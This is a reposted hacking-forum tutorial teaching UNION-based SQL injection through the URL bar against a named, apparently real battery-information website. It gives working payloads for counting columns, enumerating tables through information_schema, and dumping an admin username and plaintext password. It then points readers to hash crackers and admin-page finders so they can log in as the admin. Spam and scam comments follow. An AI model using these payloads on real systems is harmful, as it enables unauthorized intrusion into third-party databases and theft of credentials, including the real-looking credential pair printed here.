#Chapter3:Super Detailed SQL injection TUTORIAL#



Tutorial by Zer0Freak


Zer0Freak SQLi Tutorials
Difficulty: Basic Level 2 and Intermediate
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 25-30 min (reading thoroughly will help you understand better)
The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we're gonna learn today.
Previous tutorial: Bypassing Login Pages with SQL injection (Basics and Intermediate)
  • There are many types of SQL injection when it comes to web hacking
  • What we learned in the previous tutorial was the only Basics where were used it to bypass Admin/User logins.
  • However, what will you do if can't bypass it even though it's vulnerable to SQL injection?
  • Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page



Common Types of SQL injection are:
Code:
UNION Based SQL injection
String Based SQL injection
Error Based SQL injection
Double Query SQL injection
Blind SQL injection
MsSQL injection
What we are going to learn today is what we call UNION Based SQL injection
Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
Lets just say that our website will look like this :
"http://www.site.com/index.php?id=5"
Notice at the end of the URL, "id=5"
This is what the query will look like
PHP Code:
SELECT FROM index
WHERE id 
Alright, now you know a bit of how the website works, let's get hacking



Step1: Finding the vulnerability in a website
It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
Alright now to find sites vulnerable to SQLi is using Google Dorks.
If you don't know how to use dorks, visit Part 1 of this project to learn all about them
Once you've found a site vulnerable to SQLi, it's time to execute queries.
For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.

Try browsing the website and see if you can find links like "index.php?id=xxx"
It can be anything like "details.php?id=xxx" or "gallery.php?id="
Just find an address with a number at the end of the URL
Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"

Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
So it'll look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'

Now you'll notice an error saying
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
This shows that the website is vulnerable to SQL injection.
How is this possible?
Look at the query when we added a quote " ' "
PHP Code:
SELECT FROM article
WHERE id 
Notice that, their database never stored "id = 5 ' "
This is why they return an error result
Now that we know the website is vulnerable to SQL injection, let's advance to the next process



Step2: Finding the number of columns a website has

This is the part where most people had commonly misunderstood.
To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
Alright lets get started.
The query we'll be using is "order by X--" where "X" is a random integer (number)
Start by entering "order by 25--"
Enter it at the end of the URL, so it'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
Error, there are no 25 columns, so it'll be less than 25

Now lets try "order by 20--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
Still Error, so there are less than 20 columns

How about we go down a bit to "order by 5--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
aha! No errors. So let's see if there are more than 5 columns

Now lets go up to "order by 11--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
Hmm, no errors I see. So it's obvious that there could be more than 11 columns

See if we can increase to "order by 12--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
Error! So this means the last number that returned no error is 11
Therefore, the website has 11 columns

Tips:
An error while scanning for number of columns will look like this
While No errors will show the page as normal



Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
First off, we need to know what does "UNION SELECT" means
Lets say we have 2 tables, "users" and "admin"
Basically, UNION SELECT is a statement where all these information will be collected as one.
Look at this query
PHP Code:
SELECT FROM users
UNION SELECT 
FROM admin 
If we perform the UNION SELECT statement, we can get both users and admin information from their database
The point is that, UNION SELECT returns our results with the information we need
If you want to find vulnerable columns, use UNION SELECT
If you want to find version of database, UNION SELECT
If you want admin information! use UNION SELECT
Alright, now that we know something about the Union function, lets continue.

Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's how our query will look like
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
This is what you would normally do if you use UNION function while SQL injecting a website

Focus on something like this, "index.php?id=-X UNION SELECT N--"
Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"



Step4: Random numbers appear on screen, the next step
Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.
Here's how it'll look like:
You need to inject the number at the very top (always at the very top)
So, in this case we have number "8"
Now you might be asking, what can I do with a vulnerable column?
Well here's what you can get-- INFORMATION!
You need a lot of information to study from the website, here are a couple of examples.

Replace the vulnerable column i.e number 8 with a statement
Statements:
Code:
@@version, version()
database(),
user(),
@@hostname
@@datadir
Their functions
@@version/version() = find the version of the database
database() = find the current database
user() = find the user information
@@hostname = Current hosting info
@@datadir = directory of the data of the website

To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
It'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
Results:
Code:
5.1.52-log
So the database version is 5, which is good because it'll be easier to SQL inject the website.
Note:
Database version less than 5 "<5" = you need to guess tables (a bit hard work)
Database version greater than 5 ">5" = easy to inject with another function i.e group_concat

If you ever want to SQLi a website with version <5, then you can guess the tables with the following below
Code:
user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin
We'll be knowing how to get the tables in the next step.
But for now, let's see what we can get with other statements
Lets try all statements at once shall we
The URL will look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,1 ​0,11--
Results:
Code:
32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
3
We have almost every information we have about the website
Look close here, we used a command "group_concat"
Here's its function:
Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
Note:Group_concat won't work with versions less than 5



Step5:Getting the table names
What are tables?
Tables contain columns and columns contain the data
It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
Alright, first lets look up some functions we're gonna use to extract table names (Important)
Code:
group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order
Now lets combine those functions and make up a query that will give us the table names
So, here's what our link will look like:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
and then we added a
"from information_schema.tables where table_schema=database()--"
after the last column (excluding the two hyphens after 11)
Results on table names:
Code:
pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
[Image: e9syW.png]
Alright now that we've found the tables, what you're gonna have to do is
that, you have to find tables where user/admin information are stored
In this case, "tbladmin" seems to be having an admin information stored in it.
It's all about predicting and expecting what's behind every table you see
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and Add the following
Vulnerable Column = replace with "group_concat(table_name,0x0a)"
After the last column = Add "from information_schema.tables where table_schema=database()--"
Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string



Step6:Getting Columns from Tables
Alright obviously, our next task is to get the column names from a specific table which in our case was "tbladmin'
To do this, we're gonna have to alter some queries a bit
Now look closely at this syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
Here's what we replaced:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x74626c61646d696e--"
Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
First of all, these are known as Hex
To make a Hex readable, we put "0x" at the beginning
I'll explain this briefly. So our table name was "tbladmin"
To enter that table using the syntax above, we have to convert that table name to Hex
In order to do that, visit this website:
http://www.swingnote.com/tools/texttohex.php
It's a text to hex converter
Enter "tbladmin" in the text box and hit convert
You'll notice the results will be "74626c61646d696e" (that's the hex)
Now to make it readable to the website, add "0x" at the beginning
So it will be:
Code:
0x74626c61646d696e

Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)
Code:
group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex
Results after extracting column names from tables:
Code:
adminid ,username ,password ,dom
[Image: yHNL1.png]
Now that we've got the columns from that table, it's time to extract the information.
What we're gonna need here is obviously only the "username" and "password"



Step7:Getting Data from Columns
Alright, lets extract the information
Look closely at the syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
Keep this formula-like syntax in your mind whenever you want to extract data from columns
Code:
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--
Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )
CONTINUED BELOW

Now for revising,
column names = username, password
separator = 0x3a (a hex for a colon " : ")
table name = tbladmin
Once you execute that syntax, you get the username and password separated by a colon
Results after executing the syntax:
Code:
ishir:ishir123
Username: ishir
Password: ishir123



Special cases: Hashed Usernames and Passwords
Most websites will have their passwords hashed as MD5
In this case you'll need to crack them.
Using some websites will help you
Here's a list of Hash cracking websites:
Code:
www.md5decrypter.co.uk/
www.md5this.com/
www.md5crack.com/
http://hashchecker.de/find.html
An MD5 Hash will look like this:
Code:
21232f297a57a5a743894a0e4a801fc3 -- 32 characters
A SHA-1 Hash will look like this:
Code:
d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
I'll make up a detailed tutorial on Hash cracking soon.
But for now, refer to this for a little knowledge about hashes
http://www.hackforums.net/showthread.php?tid=1393830
Credits to Haxor and Insidepro




Last Step: Finding the admin page and logging in for the goods
Alright, now that we have our admin login info
Username: ishir
Password: ishir123
It's time to find the login pages
To do this, you can use Admin Page Finders
Here's some you can use
>>Scorpion Admin Page Finder<<
http://sc0rpion.ir/af/
>>Outlaw Admin Page Finder<<
http://www.tools.th3-0utl4ws.com/admin-finder/
>>Napsterakos Admin Page Finder<<
http://www.hackforums.net/showthread.php...ight=HaviJ
>>HaviJ Injector/Cracker and Admin page finder<<
http://www.hackforums.net/showthread.php...age+finder
Alright after scanning the website for admin pages, you should see something like this:
Code:
http://www.leadacidbatteryinfo.org/admin/
Now all you have to do is enter the admin details you extracted from their databases and login as an admin!
However, some websites could be already hacked and messed up
Which in our case, this website was already messed up in such a way you can't login as an admin anymore.
These are just the basics of SQL injection.
There are lots of websites to hack and more to practice with.
Just so that you'll get a clear view of this tutorial, look up a demonstration video on how I inject a site with UNION Based/Normal SQL injection:





Extras:
Acunetix Web Vulnerability Scanner:
Features: Scans a specific website of your choice for vulnerabilities and directories too
Download it by clicking here

SQL Poizon:
Scans for dorks, crawls a lot of websites at a time, organized work space for SQL injection, and a built-in browser
http://www.hackforums.net/showthread.php...SQL+poizon

SQL injection vulnerable lists:
Lists by iTz Ryannn x
http://pastebin.com/y2jD5Fgz

Lists made by Dyme
http://pastebin.com/kVMYX0Eh



Thanks for reading this tutorial and I hope you enjoyed and learn a lot from it
End of Chapter 3
Upcoming chapter: Error Based SQL injection Detailed
Need any help: zerofreak@live.com
Please stay tuned to MegaProjectSQLi by Zer0freak for more tutorials.
Have a great day

Penulis : ZentrixPlus ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel #Chapter3:Super Detailed SQL injection TUTORIAL# ini dipublish oleh ZentrixPlus pada hari Wednesday, January 18, 2012. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 42 komentar: di postingan #Chapter3:Super Detailed SQL injection TUTORIAL#
 

42 comments:

  1. Replies
    1. Chapter3:Super Detailed Sql Injection Tutorial >>>>> Download Now

      >>>>> Download Full

      Chapter3:Super Detailed Sql Injection Tutorial >>>>> Download LINK

      >>>>> Download Now

      Chapter3:Super Detailed Sql Injection Tutorial >>>>> Download Full

      >>>>> Download LINK WR

      Delete
  2. Like the blog neatly explain...Can you please share chapter 4: Double query SQL Injection??

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. This comment has been removed by the author.

    ReplyDelete
  5. Quatre decod hacker-cracker -anonymous romania hackeriii --tin kode hacker... Gucifer hacker

    ReplyDelete
  6. Apologize for unintentionally hurting someone, but don't apologize for being who you are. http://goatripsindia.com/goa-honeymoon-package

    ReplyDelete
  7. Very useful information given in this blog. I thankful for such kind of information. Keep share your knowledge. best php training in pune

    ReplyDelete
  8. Very useful, I would like to know how to update columns in table via sql injection.

    ReplyDelete
  9. I love to read this informative blog. I want to learn more about SQL injection test site. I am looking for your next blog

    ReplyDelete
  10. This blog have some good stuff, And i want to ask something why you stop writing articles. please write and post article on other topics.
    I share here an article about .net training in noida.

    ReplyDelete
  11. Excellent…Amazing…. I’m satisfied to find so many helpful information here within the put up,for latest php jobs in near me. we want work out extra strategies in this regard, thanks for sharing.

    ReplyDelete
  12. Nice! thank you so much! Thank you for sharing. Your blog posts are more interesting and informative. I think there are many people like and visit it regularly, including me.
    Happyroom2.com Tosstheturtle.net Catmariogame.com

    ReplyDelete
  13. Step by step instructions to Solve SQL Injection Issue through MySQL Technical Support
    SQL infusion which is likewise called SQLi where an aggressor can execute malignant SQL articulation that is the reason you are never again to work with your SQL. For this situation, in the event that you need to secure yourself then we have consummate alternative to dispose of this issue. Essentially connect with MySQL Remote Support or MySQL Remote Service. We have best database specialists that can give great help with respect to MySQL.
    For More Info: https://cognegicsystems.com/
    Contact Number: 1-800-450-8670
    Email Address- info@cognegicsystems.com
    Company’s Address- 507 Copper Square Drive Bethel Connecticut (USA) 06801

    ReplyDelete
  14. After All That Exam Complete, Students are now Wait For Publishing Result. So The Question is When Will BD JSC Result 2019 Publish. The Rule JSC Result 2019 Must be Publish Within December. The Bangladesh Education Board Authority Will Declared about The Result Publish Date.

    ReplyDelete
  15. mcafee antivirus is broadly utilized antivirus identifies and kill PC infection, the mail worms,the trojan programs,and additionally enables your framework to free of infection and other malware is a significant every day challenge. for more subtleties visit: mcafee enter product key code today.

    ReplyDelete
  16. Download, Install & Activate office my account for home & Business purpose and get full technical help for office setup installation. Visit : sign into office 365 personal account for more details.

    ReplyDelete
  17. SSC Result Sylhet Board 2020 will be published very soon. SSC Exam means Secondary School Certificate Examination. It is also a public examination which has taken by students of Secondary Schools in Bangladesh.

    Looking for SSC Result Mymensing board 2020, SSC Result 2020 Publish Date by Mymensing Board, Mymensing Board SSC result by Message, SSC Result Mymensing Board 2020 Check Online and Android Mobile Apps then you are the right place.

    Are you fond of Mobile and want to get your SSC Result by SMS? Do you want to know how to get SSC Exam Result by Mobile SMS? Here you can know the details.

    Are you are student of technical Education board and looking for Bangladesh Technical Boaord SSC Result 2020? Here you can find your desired information about SSC Exam Result.

    SSC Result is significant for who sat for the SSC or Dakhil or Vocational Examination in the year of 2020. In our counry Bangladesh, SSC or Secondary School Certificate examination is hard for a Secondary level students.

    ReplyDelete
  18. SSC Result 2020 Rajshahi Board will Publish under the Bangladesh Education Board of Rajshahi Computer Center. The SSC Results Rajshahi Board and Result related all data will available on here. And also on the Board of Intermediate and Secondary, Rajshahi.

    Barisal Board SSC results 2020 will be published here. I discuss all about the results and the board. Barisal Board is the authority of secondary and higher secondary educational institutions in Barisal. It controls them following rules and regulation of Education Board of Bangladesh.

    Jessore Board SSC Result 2020 will be published very soon. SSC Exam means Secondary School Certificate Examination. It is also a public examination which has taken by students of Secondary Schools in Bangladesh. There are eight general educations Board in Bangladesh.

    But unfortunately, most of the Muslim children go to general education from their childhood instated of Madrasah education. So, Details of Dakhil Result 2020 is shared below.

    Yes, it is the right place to know Chittagong Board SSC result 2020. Every year the Education Board of Bangladesh conducts the exam of SSC at the month of February to March and the exam result has to publish in every month of May.

    SSC Result BD is near to the door. It is very important for the students of SSC Exam, Dakhil Exam, and Vocational Examination in 2020. SSC stands for Secondary School Certificate which is the most significant for every student. Though it is the third board exam of a student it still has the most significant on a student’s life. Before the 2013 SSC Exam was the first board exam on a student’s life.

    ReplyDelete